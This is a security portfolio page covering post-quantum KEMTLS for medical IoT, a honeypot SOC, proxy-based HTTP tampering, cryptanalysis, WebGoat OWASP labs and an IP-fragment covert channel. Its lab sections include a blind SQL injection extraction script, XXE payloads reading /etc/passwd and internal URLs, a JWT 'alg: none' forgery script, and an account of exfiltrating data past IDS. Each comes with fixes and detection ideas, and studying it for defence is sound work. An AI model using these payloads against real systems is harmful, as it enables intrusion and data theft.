A documentation hub for security projects I've built and shipped. From post-quantum cryptography implementations to SOC infrastructure, covert communications, and threat detection systems.
Original builds from scratch. Detailed breakdowns.
23× faster quantum-safe handshakes on ESP32 medical sensors using optimized ML-KEM-512 with pre-provisioned keys and session resumption.
Pi-to-Pi KEMTLS implementation with ML-KEM-512, mutual authentication, and encrypted device-bound key storage. Handshake optimization and ESP32 migration planned as future work.
SOC environment with 3 honeypot VMs (2 Windows, 1 Linux) integrated with Microsoft Sentinel. Built custom KQL detection rules for brute force, privilege escalation, and firewall tampering mapped to MITRE ATT&CK.
TLS termination proxy demonstrating host header injection, HTTP method tampering, cookie manipulation, and HTTP vs HTTPS traffic analysis using Burp Suite, ZAP, and Fiddler.
Two-phase project: custom block-cipher combining substitution/Caesar shifts with Fisher-Yates key generation, then cryptanalysis via frequency analysis, bigrams/trigrams, and Levenshtein dictionary validation.
Hands-on exploitation of OWASP Top 10 (A1-A10): SQL injection (blind, boolean-based), IDOR user profile access, XXE→SSRF, JWT attacks, session hijacking, and XSS using WebGoat.
Covert channel using incomplete IP fragments and modulo-encoded IP IDs to transmit hidden messages undetected by IDS/IPS systems.
A documentation hub for security projects I've built and shipped. From post-quantum cryptography implementations to SOC infrastructure and threat detection systems.
Each project breaks down the concepts, explains the "why" behind technical decisions, and walks through real implementations. Built for security professionals, students, and anyone who learns by seeing how things actually work.
Whether you're exploring similar problems, looking for reference implementations, or just want to understand these topics deeper, dive in.
Working on something similar? Have questions about a project? Let's connect.
Pi-to-Pi KEMTLS Implementation for IoMT Security
Quantum computers will break RSA and ECDSA in minutes using Shor's algorithm. Every "secure" connection today uses keys that quantum computers will crack. Medical devices can't just get a firmware update when that happens - they need quantum-resistant crypto now.
Massive public keys and signatures. Not ideal when counting kilobytes.
Needs specialized hardware for efficient implementation.
Authenticates through KEM keys. More efficient in computation and bandwidth.
If the server can prove it knows the secret, it must be the real server. No signature required.
If we just send public keys over the network without verification, an attacker can intercept and substitute their own keys.
Client already has the server's authentic public key installed during manufacturing. When the server sends its key during handshake, the client compares it against what it already knows.
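The pre-provisioned-key flow can be sketched in miniature. The toy below uses a classical Diffie-Hellman-style KEM as a stand-in for ML-KEM-512 (so it is not quantum-safe, and none of these names come from the actual codebase), but the authentication logic is the same: the client encapsulates to a pinned public key, and only the holder of the matching private key can recover the shared secret.

```python
import hashlib, hmac, secrets

# Toy DH-based KEM standing in for ML-KEM-512 (classical, NOT quantum-safe;
# this illustrates the handshake flow only).
P = 2**127 - 1          # a Mersenne prime
G = 3

def kem_keygen():
    sk = secrets.randbelow(P - 2) + 2
    pk = pow(G, sk, P)
    return sk, pk

def kem_encap(pk):
    r = secrets.randbelow(P - 2) + 2
    ct = pow(G, r, P)                       # "ciphertext" sent to the server
    ss = hashlib.sha256(str(pow(pk, r, P)).encode()).digest()
    return ct, ss

def kem_decap(sk, ct):
    return hashlib.sha256(str(pow(ct, sk, P)).encode()).digest()

# --- provisioning: client receives the broker's authentic pk at manufacture ---
server_sk, server_pk = kem_keygen()
pinned_pk = server_pk                       # baked into the client at build time

# --- handshake: client encapsulates to the pinned key ---
ct, client_ss = kem_encap(pinned_pk)

# Implicit authentication: only the real private key can decapsulate,
# so a valid confirmation MAC proves identity without any signature.
server_ss = kem_decap(server_sk, ct)
confirm = hmac.new(server_ss, b"server-finished", hashlib.sha256).digest()

expected = hmac.new(client_ss, b"server-finished", hashlib.sha256).digest()
assert hmac.compare_digest(confirm, expected)   # server authenticated
```

An attacker who substitutes their own public key in transit gains nothing: the client only ever encapsulates to the pinned key, so the imposter can never derive the session secret.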
Lattice-based KEM with ~800 byte public keys
No signatures, auth through pre-provisioned keys
Both broker and client verify each other
AES-256-GCM + PBKDF2 key derivation
Master key from password + CPU serial + SD CID
"Learning with errors" is hard even for quantum computers
Trades flexibility for simplicity by pre-installing keys
Proves identity by demonstrating you can decapsulate
Keys tied to hardware become useless if extracted
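The device-bound derivation described above (master key from password + CPU serial + SD CID) can be sketched with stdlib PBKDF2. The identifier values below are placeholders, not the project's actual code; on a real Raspberry Pi the serial comes from /proc/cpuinfo and the SD card CID from /sys/block/mmcblk0/device/cid.

```python
import hashlib

def derive_master_key(password: str, cpu_serial: str, sd_cid: str) -> bytes:
    # Device binding: hardware identifiers feed the PBKDF2 salt, so the
    # derived key is useless if the encrypted store is copied to another
    # board or SD card.
    salt = hashlib.sha256((cpu_serial + sd_cid).encode()).digest()
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                               iterations=200_000, dklen=32)  # tune iterations up in production

# Placeholder identifiers for illustration only.
key = derive_master_key("device-passphrase", "100000002f3c9a1e", "d27b4b38")
```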
Pi-to-Pi architecture with full KEMTLS handshake, mutual authentication, and encrypted key storage working on Raspberry Pi 4.
Handshake optimization for lower latency, ESP32 migration for constrained devices, session resumption. See GitHub for full roadmap.
Watch Real Attackers Hit Your Systems
Security Operations Centers (SOCs) are the nerve center of enterprise defense. Analysts sit in front of dashboards watching for threats - but what are they actually looking at? How do you learn to spot an attack when you've never seen one? You can read case studies, but nothing teaches like watching real attackers hit your systems in real-time.
A honeypot flips the script: instead of defending production systems, you deploy intentionally vulnerable systems and invite attackers in. Every connection is suspicious. Every login attempt is data. This project builds a complete SOC environment from scratch - not to stop attacks, but to study them.
The setup mirrors real enterprise environments but with intentional exposure:
2 Windows (RDP on 3389), 1 Linux (SSH on 22). NSG rules initially wide open to attract scanners.
Central log aggregation via Data Collection Rules (DCR) and Azure Monitor Agent (AMA).
Cloud-native SIEM/SOAR. Correlates events, runs analytics rules, generates incidents.
Target resources for privilege escalation. Monitored for unauthorized access attempts.
Raw logs are noise - thousands of events per hour. A successful login, a failed login, a service starting, a file being accessed. The SOC analyst's job isn't to read every log; it's to find the signal in the noise. That's detection engineering.
Think SQL optimized for time-series security data. Every SOC analyst needs KQL fluency - it's how you ask questions like "show me all failed logins from IPs that later succeeded" or "find processes spawned by Word documents."
The challenge: write rules sensitive enough to catch real attacks, but not so broad they drown analysts in false positives. Too many alerts = alert fatigue = missed breaches.
Each rule maps to MITRE ATT&CK - the industry-standard framework categorizing real-world attacker techniques. This isn't academic; these are the same TTPs (Tactics, Techniques, Procedures) used in actual breaches:
10+ failed logins from same IP within 5 minutes triggers alert. Works for both Windows (Event ID 4625) and Linux (/var/log/auth.log). Real attackers use automated tools that try thousands of passwords - this catches them early.
Monitors Azure AD/Entra ID role assignments and local admin group changes. Attackers who get initial access immediately try to escalate - this catches the moment they succeed.
Windows Defender Firewall disabled via netsh or PowerShell. First thing many attackers do after landing - disable defenses. If the firewall goes down unexpectedly, something's wrong.
Suspicious process creation, encoded PowerShell, living-off-the-land binaries (LOLBins). Catches attackers using built-in tools to avoid detection.
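The brute-force rule's core logic - a sliding five-minute window of failures per source IP - looks roughly like this. This is an illustrative Python model of the detection, not the deployed KQL:

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD, WINDOW = 10, timedelta(minutes=5)

def detect_brute_force(events):
    """events: iterable of (timestamp, source_ip, succeeded), sorted by time.
    Mirrors the Sentinel rule: 10+ failures from one IP inside 5 minutes."""
    recent = defaultdict(deque)          # ip -> timestamps of recent failures
    alerts = set()
    for ts, ip, succeeded in events:
        if succeeded:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > WINDOW:  # slide the 5-minute window forward
            q.popleft()
        if len(q) >= THRESHOLD:
            alerts.add(ip)
    return alerts
```

The threshold and window are exactly the knobs that control the false-positive trade-off: tighten them and you miss slow sprays, loosen them and you page the analyst for every fat-fingered password.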
To validate detections, I simulated realistic attack scenarios from a separate attacker VM:
Automated RDP/SSH login attempts with common username/password combinations
Malicious commands on Linux VM to generate security events and test detection coverage
Enriched incidents with attacker IP geolocation, built workbooks for visualization
Within 48 hours of deployment, the honeypot was receiving real brute-force attempts from around the world. Internet-facing services with weak credentials get found fast.
You can't detect what you can't see. Centralizing logs is step one of any security program.
Rules that catch attackers without drowning in false positives. It's an art and a science.
Speaking the common language of threat intel. Maps detections to real-world attacker behavior.
Intercept, Analyze, and Understand HTTP Traffic
Every web security professional needs to understand one fundamental concept: the browser lies to you. What you see in DevTools is not necessarily what's being sent to the server. What the server sends back can be modified before your browser renders it. The tool that makes this visible - and manipulable - is a proxy.
A TLS termination proxy sits between your browser and the server, intercepting every request and response. For penetration testers, it's the most important tool in the arsenal. For defenders, understanding how proxies work is essential because this is exactly how your applications will be attacked.
I built a deliberately vulnerable web application to test against:
Local server hosting PHP pages. Full control over server config to test various scenarios.
GET (credentials in URL) vs POST (credentials in body). Demonstrates why this matters.
Implemented with and without security flags to show the difference.
Both versions to compare what's visible with and without encryption.
login.php?user=admin&pass=secret123
This URL gets logged in server access logs (now your password is in a text file), saved in browser history (anyone with access can see it), sent in Referer headers to external sites, cached by proxies and CDNs, and bookmarked accidentally. Never send sensitive data via GET.
Changed the Host header from localhost to www.google.com in the Intercept tab. Server still returned 200 OK because Host is just for virtual hosting - the request still went to localhost. But this reveals a critical vulnerability: improperly configured servers use Host header in password reset links, cache keys, and redirects. Attackers exploit this for cache poisoning and password reset hijacking.
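The same experiment can be reproduced in a few lines of stdlib Python. This is a sketch, not the lab setup: a local server stands in for the Apache/PHP target, and like the misconfigured original it never validates the Host header.

```python
import http.client, http.server, threading

# Minimal local server standing in for the lab's PHP target. A name-based
# virtual-host server would dispatch on Host; this one ignores it entirely.
class OkHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")
    def log_message(self, *args):        # silence request logging
        pass

server = http.server.HTTPServer(("127.0.0.1", 0), OkHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

# The TCP connection physically goes to 127.0.0.1, but the request claims
# to be for google.com - the same edit made in Burp's Intercept tab.
conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1])
conn.request("GET", "/", headers={"Host": "www.google.com"})
status = conn.getresponse().status       # 200 OK despite the forged Host
server.shutdown()
```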
Used "Change Request Method" to convert POST to GET. Credentials moved from request body to URL parameters. Server accepted it (200 OK), demonstrating that the app doesn't enforce method restrictions. Now those credentials are exposed in logs, history, and Referer headers. Real impact: authentication bypass, logging of sensitive data.
Why do attackers prefer HTTP/1.0? No persistent connections (harder to track), fewer header restrictions, easier proxy manipulation, and many servers have looser validation for legacy protocol support. Changed version in Burp - server accepted HTTP/1.0 with custom headers, proving it's vulnerable to downgrade attacks.
Cookies are how web apps maintain state. Get someone's session cookie, and you are them. ZAP's HUD mode let me intercept responses and inject cookies with different security configurations:
JavaScript can't read cookie via document.cookie. Prevents XSS from stealing sessions.
Only sent over HTTPS. Prevents interception on HTTP downgrade or mixed content.
Controls cross-origin requests. Strict/Lax prevents CSRF attacks.
Key finding: Setting a cookie with an expiration date in the past forces immediate deletion. This is how logout works - and how attackers can force re-authentication.
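The deletion trick is visible in the Set-Cookie header itself. A minimal sketch with the stdlib cookie module, flags included:

```python
from http import cookies

# A cookie whose Expires date is in the past tells the browser to delete it
# immediately - the standard logout mechanism, and a lever for forcing
# re-authentication.
jar = cookies.SimpleCookie()
jar["session"] = "deleted"
jar["session"]["expires"] = "Thu, 01 Jan 1970 00:00:00 GMT"
jar["session"]["httponly"] = True        # not readable via document.cookie
jar["session"]["secure"] = True          # never sent over plain HTTP

header = jar["session"].OutputString()
# a Set-Cookie value like: session=deleted; expires=Thu, 01 Jan 1970 ...; HttpOnly; Secure
```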
Captured the same login on both HTTP and HTTPS to visualize the difference:
Headers, syntax view, and raw body all visible in plaintext. Credentials, session tokens, API keys - everything readable. Anyone on the same network (coffee shop WiFi, corporate network, ISP) can see this traffic.
An encrypted blob - without the proper certificate, nothing is readable. Fiddler can only decrypt HTTPS if you install its CA certificate, which is why corporate environments do this for inspection, and why it's a privacy concern.
How proxies decrypt HTTPS by acting as man-in-the-middle with trusted certificates.
Cookies without flags are vulnerable. Defense requires HttpOnly + Secure + SameSite.
Never trust client-controlled data. Validate methods, headers, and origins server-side.
Build the Lock, Then Pick It
Cryptography is one of those fields where you can read textbooks forever and still not truly understand why certain things are secure and others aren't. The gap between "this algorithm uses a 26! key space" and "this algorithm is trivially broken" isn't obvious until you've actually broken something yourself.
This project was born from a simple question: if I design my own cipher - one that combines multiple classical techniques - can I then write code to crack it? The answer taught me more about why modern cryptography works than any lecture could.
Every natural language has a statistical fingerprint. In English, 'E' appears ~12.7% of the time, 'T' ~9%, 'TH' is the most common bigram, 'THE' the most common trigram. This fingerprint survives encryption unless the cipher specifically destroys it, and most classical ciphers don't.
I wanted something more sophisticated than a basic substitution cipher. The design combines two classical techniques in a way I thought might be harder to break:
The theory: combining substitution (confuses letter identity) with shifting (varies by block) should make frequency analysis harder. Each block's Caesar shift depends on its first character, creating a form of key-dependent variation.
The substitution table is the cipher's heart. I implemented three ways to generate it:
hilwmkbdpcvazusjgrynqxofte
Fixed for testing. Known key = known weakness, but useful for validation.
srand(time(0))
Proper random permutation algorithm. Each of 26! arrangements equally likely.
custom 26-letter input
For controlled experiments. Human-chosen keys are often weaker than random.
Why Fisher-Yates? Naive shuffling algorithms (like swapping each element with a random position) don't produce uniform distributions. Fisher-Yates guarantees every permutation has equal probability - a subtle but critical detail in cryptographic key generation.
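The algorithm itself is a few lines. A sketch of the uniform shuffle (Python here for illustration; the project used C with srand):

```python
import random

def fisher_yates(seq):
    """Uniform shuffle: element i swaps with a uniformly chosen index j <= i.
    Every one of the n! orderings is produced with equal probability."""
    a = list(seq)
    for i in range(len(a) - 1, 0, -1):
        j = random.randint(0, i)         # inclusive: j may equal i (no swap)
        a[i], a[j] = a[j], a[i]
    return a

table = fisher_yates("abcdefghijklmnopqrstuvwxyz")
```

The naive variant (swap every position with a random index in 0..n-1) has n^n equally likely executions, which cannot map evenly onto n! permutations - hence the bias.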
Here's the uncomfortable truth I discovered: my "sophisticated" cipher is still fundamentally broken. The dual-layer design doesn't eliminate the statistical fingerprint - it just obscures it slightly.
Count frequency of each block's first character. These are pure substitution - no shifting applied.
Match most frequent ciphertext characters to E, T, A, O, I, N. Bigram analysis refines guesses.
Once first char is known, its index determines the shift. Reverse the Caesar cipher on remaining 5.
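The inversion step can be sketched concretely. This assumes one plausible reading of the design (first character substitution-only; its alphabet index is the Caesar shift applied, after substitution, to the other five) - the real code may differ in details:

```python
ALPHA = "abcdefghijklmnopqrstuvwxyz"
SUB = "hilwmkbdpcvazusjgrynqxofte"       # the fixed test table from the project
INV = {c: p for p, c in zip(ALPHA, SUB)}

def shift(c, k):
    return ALPHA[(ALPHA.index(c) + k) % 26]

def encrypt_block(p):                    # toy model of the 6-char block cipher
    k = ALPHA.index(p[0])                # shift keyed by first plaintext char
    return SUB[ALPHA.index(p[0])] + "".join(
        shift(SUB[ALPHA.index(c)], k) for c in p[1:])

def break_block(block):
    p0 = INV[block[0]]                   # steps 1-2: substitution-only position
    k = ALPHA.index(p0)                  # step 3: first char leaks the shift
    return p0 + "".join(INV[shift(c, -k)] for c in block[1:])
```

One recovered substitution mapping for the first character hands you the shift for the whole block - which is exactly why breaking one character breaks five.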
Understanding why the attack works is more valuable than just knowing that it does:
Fixed 6-character blocks mean the same plaintext always produces the same ciphertext. No initialization vector, no randomization. ECB mode's fatal flaw, repeated here.
The first character of each block gets only substitution - no shift. This creates a pure monoalphabetic subset that's trivially breakable with enough text.
Once you crack the first character, you know the shift. Breaking one breaks five. The cipher's "layers" are actually a single point of failure.
Each block's shift is 0-25. That's 26 possibilities - trivially brute-forceable even without frequency analysis. Modern ciphers need 2^128+ combinations.
Raw frequency analysis produces guesses, not certainties. The breakthrough came from adding dictionary validation to confirm decryption attempts:
Measures the minimum number of single-character edits (insertions, deletions, substitutions) needed to transform one string into another. Distance 0 = exact match. Distance 1 = one typo. This allows fuzzy matching against a 10,000-word English dictionary, catching partial decryptions.
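The standard dynamic-programming formulation fits in a dozen lines. A sketch of the distance function used for the fuzzy dictionary check:

```python
def levenshtein(a: str, b: str) -> int:
    """Classic DP: cell (i, j) holds the edit distance between a[:i] and b[:j]."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution (or match)
        prev = cur
    return prev[-1]
```

So a near-miss decryption like "attcak" sits at distance 2 from "attack" - close enough to count as a dictionary hit with MAX_DISTANCE >= 2.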
The user can tune three parameters to balance accuracy vs. speed: MAX_DISTANCE (how fuzzy to match), SLIDING_BLOCK_SIZE (segment length to test), and MAX_OPTIONS (recommendations per segment). This makes the tool interactive - the cryptanalyst guides the process rather than waiting for a black-box answer.
Layering weak algorithms doesn't create a strong one. Each layer needs to be independently secure, and their combination mustn't introduce new weaknesses.
If your cipher doesn't destroy the statistical properties of the plaintext, it's vulnerable. Modern ciphers like AES achieve near-perfect diffusion - changing one input bit changes ~50% of output bits.
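The avalanche effect is easy to see empirically. This sketch uses SHA-256 as a stand-in for a block cipher (same diffusion design goal, and it keeps the example stdlib-only):

```python
import hashlib

def avalanche(msg: bytes, bit: int) -> int:
    """Flip one input bit and count how many of the 256 output bits change."""
    flipped = bytearray(msg)
    flipped[bit // 8] ^= 1 << (bit % 8)
    a = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    b = int.from_bytes(hashlib.sha256(bytes(flipped)).digest(), "big")
    return bin(a ^ b).count("1")

changed = avalanche(b"attack at dawn", 0)   # typically close to 128 of 256 bits
```

My cipher fails this test completely: flip one plaintext bit and only one ciphertext character changes, leaving the statistical fingerprint intact.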
The lesson every cryptographer learns: use vetted algorithms. I broke my own cipher in hours. Real attackers have more time, resources, and expertise.
I understood frequency analysis conceptually before. After implementing it and watching it decrypt my own ciphertext character by character, I felt why it works.
Learn by Exploiting Real Vulnerabilities
Security certifications teach you what vulnerabilities are. But there's a gap between reading "SQL injection occurs when user input is concatenated into queries" and actually sitting in front of a login form, crafting a payload, watching the database spill its secrets, and thinking "oh, that's why this matters."
WebGoat is OWASP's deliberately vulnerable application - designed to be broken. Every vulnerability from the OWASP Top 10 is implemented here, waiting to be exploited. This isn't theory; it's hands-on offensive security training.
You can't defend against what you don't understand. The best security engineers I've studied under all have offensive backgrounds - they know how attackers think because they've done it themselves (legally). This project was about developing that mindset.
This isn't a theoretical list - it's compiled from real breach data. These are the vulnerabilities that actually get exploited in production systems. If you're building or securing web applications, every item on this list should be second nature.
SQL injection has been on the Top 10 for over two decades. It should be extinct. Yet it still accounts for a significant percentage of breaches because developers keep making the same mistake: concatenating user input into queries.
Tom' AND SUBSTRING(password,1,1)='t' --
The server doesn't show me the password directly. But it behaves differently based on whether my condition is true. If the first character is 't', I get Tom's profile. If not, I get nothing. By iterating through characters and positions, I extract the entire password one character at a time. Slow, but effective - and completely invisible in application logs.
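The whole attack fits in a short script. This is a self-contained model, not WebGoat's code: an in-memory SQLite table plays the victim, and the oracle loop extracts the password exactly as described (SUBSTR is SQLite's spelling of SUBSTRING).

```python
import sqlite3, string

# Victim app: concatenates user input straight into the query (the bug).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('Tom', 'trustno1')")

def profile_exists(user_input: str) -> bool:
    query = f"SELECT 1 FROM users WHERE name = '{user_input}'"   # vulnerable
    return db.execute(query).fetchone() is not None

# Attacker: a true/false oracle, one character per probe. The template's own
# trailing quote closes the injected condition.
def extract_password():
    recovered = ""
    while True:
        for ch in string.ascii_lowercase + string.digits:
            probe = f"Tom' AND SUBSTR(password,{len(recovered) + 1},1)='{ch}"
            if profile_exists(probe):
                recovered += ch
                break
        else:
            return recovered        # no character matched: end of password
```

Each probe looks like a normal profile lookup in the application logs; only the pattern of hundreds of near-identical requests gives it away.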
The Fix: Parameterized queries. Never, ever concatenate user input into SQL. ORMs help but aren't foolproof - raw queries in ORM code are still vulnerable.
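For contrast, the fixed version of the same lookup, again sketched with stdlib SQLite:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('Tom', 'trustno1')")

def profile_exists(user_input: str) -> bool:
    # Placeholder binding: the driver passes the value separately from the
    # SQL text, so quotes and keywords in user_input are data, never syntax.
    row = db.execute("SELECT 1 FROM users WHERE name = ?",
                     (user_input,)).fetchone()
    return row is not None

# The blind-SQLi probe is now just a weird, nonexistent username:
profile_exists("Tom' AND SUBSTR(password,1,1)='t")   # no longer injectable
```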
Insecure Direct Object References sound complicated. They're not. It's when the application checks if you're logged in but doesn't check if you're allowed to access that specific resource.
/IDOR/profile/2342384 → /IDOR/profile/2342385 → /IDOR/profile/2342386
I'm logged in as user 2342384. What if I just change the ID in the URL? In a vulnerable application, I can view anyone's profile. Worse: if PUT/PATCH requests are similarly unprotected, I can modify other users' data. I fuzzed user IDs, found valid profiles, and modified them - all while the application thought I was only accessing my own account.
The Fix: Authorization checks on every request. The question isn't "is this user logged in?" but "is this user allowed to access this specific resource?"
XML External Entity injection exploits XML parsers that process external entity declarations. By itself, it can read local files. But the real power comes from chaining it into other attacks.
<!ENTITY xxe SYSTEM "file:///etc/passwd">
The XML parser fetches the local file and includes its contents in the response. I can read any file the web server has access to.
<!ENTITY xxe SYSTEM "http://internal-api/">
The parser will fetch URLs too. Now I can access internal services that aren't exposed to the internet - cloud metadata endpoints, internal APIs, admin panels.
The Fix: Disable external entity processing in XML parsers. Most modern parsers have this disabled by default, but legacy code often enables it explicitly.
JSON Web Tokens are everywhere - they're how most modern applications handle authentication. But they're often implemented incorrectly, creating serious vulnerabilities.
Some libraries accept "alg": "none" - a token with no signature at all. Or I can switch from RS256 (asymmetric) to HS256 (symmetric) and sign with the public key.
JWTs signed with weak secrets can be cracked offline. I captured tokens, ran them through hashcat, recovered the secret, and could forge any token I wanted.
Once I can forge signatures, I modify claims: change "user" to "admin", extend expiration, add permissions. The server trusts what's in the token.
Combined with XSS, I can steal JWTs from other users. Unlike session cookies with HttpOnly, JWTs stored in localStorage are accessible to JavaScript.
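The "alg": "none" forgery is small enough to show end to end. A self-contained sketch: the `naive_decode` verifier below is a deliberately broken model of the vulnerable libraries, not any real JWT implementation.

```python
import base64, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

# Forged token: the header announces "no signature", the payload claims admin.
header  = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"user": "admin", "exp": 9999999999}).encode())
token = f"{header}.{payload}."           # empty third segment: no signature

# A broken verifier that honours the attacker-controlled alg field:
def naive_decode(tok):
    h, p, sig = tok.split(".")
    hdr = json.loads(b64url_decode(h))
    if hdr["alg"] == "none":             # the fatal branch: trusting the header
        return json.loads(b64url_decode(p))
    raise ValueError("signature check required")

claims = naive_decode(token)             # accepted: {'user': 'admin', ...}
```

The fix is the mirror image: the server pins the expected algorithm and key server-side and rejects anything else, instead of letting the token describe its own verification.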
The OWASP Top 10 is just the start. Each vulnerability teaches a different lesson about trust, validation, and defense:
Every vulnerability follows the same approach - the same methodology used in real penetration tests:
Step 6 is what separates security researchers from attackers. Every exploit I performed, I documented the fix. Understanding both sides is what makes a complete security professional.
Every input vector is an attack surface. Parameters, headers, cookies, file uploads - assume all of it is malicious until proven otherwise.
No single control is sufficient. WAF, input validation, parameterized queries, CSP, CORS - each layer catches what the others miss.
When SQLi happens (and it will), the database user shouldn't have DROP privileges. Limit blast radius at every level.
COmmunicating Through Incomplete IP Packets
Most security focuses on what data is being sent - inspecting payloads for malware, scanning for suspicious patterns, blocking known-bad signatures. But what if the data itself looks completely innocent? What if the secret message is hidden not in the content, but in the structure of the communication itself?
This is the domain of covert channels - communication paths that were never intended by the system designers. They exploit the gap between what a protocol is supposed to do and what it can do. This project implements COTIIP (COmmunicating Through Incomplete IP Packets), based on research by Tommasi et al. at the University of Salento.
From a defender's perspective, covert channels represent a fundamental blind spot. From an attacker's perspective, they're a way to exfiltrate data past even sophisticated security controls.
An attacker with code execution but blocked outbound connections can still exfiltrate data through protocol manipulation. Firewalls see "normal" traffic.
Malware can receive instructions hidden in seemingly innocuous network traffic - DNS responses, ICMP packets, or malformed TCP headers.
Understanding how these channels work is essential for both building better defenses and understanding the sophistication of modern threats.
When an IP packet is too large for the network's Maximum Transmission Unit (MTU), it gets fragmented. The receiver collects all fragments and reassembles them before passing data to the transport layer. This is normal, expected behavior - but it creates opportunities.
Identification: 16-bit field that identifies which fragments belong together. Fragment Offset: Where this fragment fits in the original packet. Flags: MF (More Fragments) indicates more are coming. These fields exist purely for reassembly - and can be manipulated.
COTIIP exploits a simple insight: the sender transmits packets with sequentially incrementing IP IDs, but deliberately sends some as incomplete fragments (first fragment with MF bit set, remaining fragments never sent). The receiver decodes the message by noting which IP IDs are missing or incomplete.
Characters are encoded using IP_ID mod n where n=37 (26 letters + 10 digits + space). For example, if a packet with ID 14322 is incomplete, the encoded character is 14322 mod 37 = 3 = 'd'. The receiver collects all missing/incomplete IDs and decodes the message.
Sequential IP IDs with complete, normal traffic
Send incomplete fragments (MF=1, no follow-up) at specific IDs
Network sees reassembly timeouts - normal packet loss
Receiver applies modulo to missing IDs to recover message
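The encode/decode arithmetic from the steps above can be sketched without any raw sockets (Python here for clarity; the project itself is C). The 16-bit wraparound of real IP IDs is ignored in this toy.

```python
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789 "   # 37 symbols

def ids_to_leave_incomplete(message, start_id=14300):
    """Walk the ID counter upward; mark the first ID whose value mod 37
    encodes the next character as 'send incomplete' (MF=1, no follow-up)."""
    marked, next_id = [], start_id
    for ch in message:
        target = ALPHABET.index(ch)
        while next_id % 37 != target:
            next_id += 1        # these IDs carry complete, boring packets
        marked.append(next_id)
        next_id += 1
    return marked

def decode(incomplete_ids):
    # Receiver side: sort the IDs that never reassembled, take each mod 37.
    return "".join(ALPHABET[i % 37] for i in sorted(incomplete_ids))
```

This matches the worked example: ID 14322 mod 37 = 3, and index 3 in the alphabet is 'd'.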
The genius of this technique is what security tools don't look at:
Payload inspection - scanning the actual data content for malware signatures, suspicious patterns, sensitive data. The assumption is that malicious data lives in the payload.
Protocol headers - which are typically trusted. The payload can be completely empty or filled with random bytes. The real data is in the structure, not the content.
In Wireshark, these packets show up as "fragment overlap" or "reassembly error" - logged as network glitches, not data exfiltration. A busy analyst would scroll right past them.
Built in C using raw sockets to forge IP packets. The sender transmits packets with incrementing IDs, sending incomplete fragments (MF bit set, no follow-up) when the ID mod 37 matches the character to encode. The receiver sorts incoming IDs and decodes the message from the gaps.
Forges IP packets with raw sockets, sends incomplete fragments at calculated ID values
Monitors IP IDs, identifies missing/incomplete packets, applies modulo to decode message
Tested across multiple network hops with firewalls and security systems in path
Bandwidth is inherently low - covert channels trade speed for stealth. Real-world network packet loss can cause decoding errors, requiring error correction mechanisms for reliability. The channel remains invisible to standard security monitoring.
Understanding how to build covert channels teaches you how to detect them:
Normal traffic has characteristic patterns. Covert channels often show unusual distributions in fields like TTL, fragment counts, or inter-packet timing.
Track reassembly failures over time. A sudden spike in "corrupted" fragments from a specific host might indicate covert communication.
Data can hide in structure, not just content. Every protocol field is a potential carrier.
Payload-only inspection misses header-based attacks. Security must consider the entire packet.
A core Internet mechanism becomes an attack vector. Legacy features often hide security risks.
A Practical Approach for Next-Generation Healthcare Devices
Healthcare now relies heavily on IoMT devices that communicate continuously over networks. These devices generate real-time clinical data that must remain confidential and tamper-proof. Their limited hardware makes strong security difficult to apply efficiently, and advances in quantum computing are introducing risks that current cryptography cannot withstand.
Attackers can capture encrypted medical data today and decrypt it in the future once quantum systems mature.
Quantum computers will be able to break RSA and ECC, the algorithms that currently protect IoMT communication.
IoMT devices rely on secure channels vulnerable to future quantum attacks, making long-term data protection critical.
Quantum computing will break classical cryptography used in healthcare systems.
New algorithms designed to remain secure even against quantum-level attacks.
A standardized lattice-based PQC algorithm used for efficient quantum-safe key establishment.
Global standards are moving toward PQC, making early adoption critical for long-term security.
Medical IoT devices are extremely resource-constrained. PQC algorithms are secure but computationally heavy. Our solution: an optimized PQC implementation tailored for medical IoT workloads - quantum-safe security with practical real-time performance.
ESP32 microcontrollers (sensor nodes), Raspberry Pi (MQTT broker with failover)
ML-KEM-512 for PQ key exchange, AES-256-GCM for symmetric encryption, pre-provisioned public keys
Signature verification completely eliminated
KEMTLS shows much more consistent performance
Altered ECG or sensor data can mislead clinicians and impact patient safety.
Compromised keys allow attackers to impersonate medical devices and inject false data.
Medical records stay sensitive for decades - attackers can "harvest now, decrypt later".
Weak IoT devices can infiltrate hospital networks and access critical systems.
PQC integration without redesigning existing medical infrastructure.
Hybrid compatibility: classical + PQC for smooth transitional deployment.
Pre-provisioned PQC keys simplify device onboarding and provisioning.
Seamless integration into existing IoMT communication flows.
Quantum threats are inevitable - preparation must start now.
Medical IoT needs optimized, not generic, PQC solutions. Our implementation shows PQC can be efficient even on constrained devices, supporting real-world migration and commercialization opportunities.